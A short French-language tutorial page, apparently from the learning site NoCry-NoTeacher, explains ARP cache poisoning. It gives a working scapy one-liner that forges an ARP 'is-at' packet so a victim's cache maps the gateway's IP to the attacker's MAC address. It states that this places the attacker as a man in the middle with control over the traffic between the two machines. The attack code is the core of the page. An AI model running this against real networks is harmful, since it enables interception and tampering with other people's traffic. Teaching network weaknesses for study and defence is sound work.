ARP Cache Poisoning

L'ARP Cache Poisoning est une attaque extrêmement simple et rapide à mettre en place, car il s'agit juste de modifier l'adresse MAC d'une entrée dans le cache ARP par une autre.

Pour se faire, il suffit simplement de forger un paquet ARP de type "is-at" et de l'envoyer, avec scapy, cette attaque peut ce faire en une seul ligne.

>>> target = "192.168.178.1"
>>> victim = "192.168.178.48"
>>> sendp(Ether(dst=getmacbyip(victim),src="votre_adresse_mac")/ARP(op="is-at",hwsrc="votre_adresse_mac", hwdst=getmacbyip(victim), psrc=target, pdst=victim))

Utilisé avec l'adresse MAC de votre machine vous serait placé en Man In the Middle, c'est à dire que votre machine sera entre les deux machines, ce qui vous donne un contrôle sur leurs traffics.

NCNT

NoCry-NoTeacher est un site de partage et d'apprentissage à tout ce qui attrait à l'informatique

Faiblesse du protocole ARP

ARP Cache Poisoning